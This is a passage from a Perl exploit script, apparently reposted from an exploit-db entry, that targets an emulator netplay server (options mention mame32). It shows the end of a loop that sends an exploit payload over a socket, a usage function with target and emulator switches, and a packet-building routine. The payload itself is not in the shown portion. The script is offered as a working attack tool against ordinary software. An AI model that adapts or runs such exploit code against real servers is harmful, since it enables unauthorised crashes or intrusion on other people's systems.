sendpacket(\$sock, $ServerExploit);
if (defined $delay) {
sleep $delay;
}
}
}
}
$sock->close;
########### FUNCTIONS #####################
sub help{
print "\r\nUsage: $0 -port=1111 -ip=1.1.1.1 -t=supra -emu=mame32 -targets -emus -delay 10 -debug -help\n";
exit 0;
}
#This sendmessage function takes a message and an ip, and sends it nicely - thanks jediknight304
#sendpacket($socket, $message, $anothermessage);
sub sendpacket{
my $sock = shift;
bless $sock, "IO::Socket::INET";
my @messages = @_;
my $numberofmessages = @messages;
my $messagesbyte = pack('c',$numberofmessages);#how many messages are in our packet
my $packet;
for(@messages){
#each client has to have an incrementing packet number
my $header = pack('v', $inc{$$sock->peeraddr}++) . pack ('v', length($_));
$packet .= $header.$_;
}
$$sock->send($messagesbyte.$packet) or die "Couldn't send:\n$packet\n$!";

}

Source: http://www.exploit-db.com/exploits/17460/

© 2022 AppUnix | Built using WordPress and MxGuard